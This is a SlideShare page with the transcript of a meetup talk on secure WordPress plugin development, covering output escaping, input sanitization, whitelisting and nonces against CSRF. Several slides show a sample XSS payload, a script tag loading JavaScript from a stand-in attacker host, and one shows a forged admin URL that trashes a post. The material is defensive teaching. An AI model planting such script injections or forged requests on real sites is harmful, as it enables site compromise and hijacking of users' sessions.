Secure WordPress Development Practices
Upcoming SlideShare
Loading in...5
×
 

Secure WordPress Development Practices

on

  • 2,262 views

I gave this talk at the September OCWP developer meetup.

I gave this talk at the September OCWP developer meetup.

Statistics

Views

Total Views
2,262
Views on SlideShare
2,261
Embed Views
1

Actions

Likes
2
Downloads
9
Comments
2

1 Embed 1

https://twitter.com 1

Accessibility

Categories

Upload Details

Uploaded via as Adobe PDF

Usage Rights

CC Attribution License

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

Secure WordPress Development Practices Secure WordPress Development Practices Presentation Transcript

  • So you’re writing code for the masses, huh? Are you being responsible and protecting them from getting pwned?
  • Watch This. http://wordpress.tv/2011/01/29/mark-jaquith-theme-plugin-security/
  • That guy pwned a plugin I wrote live on stage at WordCamp New York. It changed my life.
  • Read This. http://wp.tutsplus.com/tutorials/creative-coding/data-sanitization-and-validation-with-wordpress/
  • tl;dr • Keep your dev environment clean • Escape your data output • Sanitize your data inputs • Validate referrers • Core functionality should always trump your super awesome functionality
  • Keep Your Dev Environment Clean Don’t think that just because you’re on a mac you’re safe from viruses. If you’re on a PC, you should assume you’re already pwned.
  • Kaspersky Anti-Virus • I use it. • Dre uses it. • Tony uses it. • You should be using it.
  • Trust No One, Trust Nothing
  • XSS: Cross-site Scripting Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications. XSS enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy. Cross-site scripting carried out on websites accounted for roughly 84% of all security vulnerabilities documented by Symantec as of 2007.[1] Their effect may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site's owner. http://en.wikipedia.org/wiki/Cross-site_scripting
  • Escape All The Things On Output http://codex.wordpress.org/Data_Validation#Output_Sanitation • Bad data will be tamed • esc_{context} • esc_js - Escape single quotes, htmlspecialchar " < > &, and fix line endings. • esc_html - Escaping for HTML blocks. • esc_attr - Escaping for HTML attributes. • esc_sql - Escapes data for use in a MySQL query. • esc_url - Checks and cleans a URL. • esc_textarea - Escaping for textarea values.
  • Sanitize All The Things On Input http://codex.wordpress.org/Data_Validation#Input_Validation • sanitize_* and similar functions help for most things • $_POST = array(‘e’=>‘<script src=‘http://pwnd.com/u.js’></script>’) • BAD: update_post_meta($id, ‘e’, $_POST[‘e’]) • GOOD: update_post_meta($id, ‘e’, sanitize_email($_POST[‘e’])) • Note: Might unintentionally change data and give unexpected results
  • Whitelisting Data http://codex.wordpress.org/Data_Validation#Whitelist • Whitelisting data - Only accept known data • $_POST = array( ‘pwn’=>‘<script src=‘http://pwnd.com/u.js’></script>’, ‘e’=‘email@domain.com’ ); • BAD: • foreach( $_POST as $key => $val ) : update_post_meta($id, $key, $val); endforeach; • GOOD: update_post_meta($id, ‘e’, sanitize_email($_POST[‘e’]))
  • Blacklisting Data http://codex.wordpress.org/Data_Validation#Blacklist • Blacklisting data - Only accept data if it’s in the proper format • $_POST = array( ‘e’=‘me@domain.’ ); • if( is_email($_POST[‘e’]) ) update_post_meta( $id, ‘e’, sanitize_email($_POST[‘e’]) );
  • CSRF: Cross-site Request Forgery Cross-site request forgery, also known as a one-click attack or session riding and abbreviated as CSRF (sometimes pronounced sea-surf[1]) or XSRF, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts.[2] Unlike cross-site scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user's browser. http://en.wikipedia.org/wiki/Cross-site_request_forgery
  • Sweet, this might lead to my next big deal! ACCEPT!
  • zOMG WTF?! http://mysite.com/wp-admin/post.php?post=307&action=trash
  • Nonces FTW! (http://codex.wordpress.org/WordPress_Nonces) • Before the Request • wp_nonce_url • wp_create_nonce • wp_nonce_field • Verify the Request • wp_verify_nonce • check_admin_referer
  • Is there an API for that?
  • Professional WordPress Plugin Development http://amzn.to/plugindevbook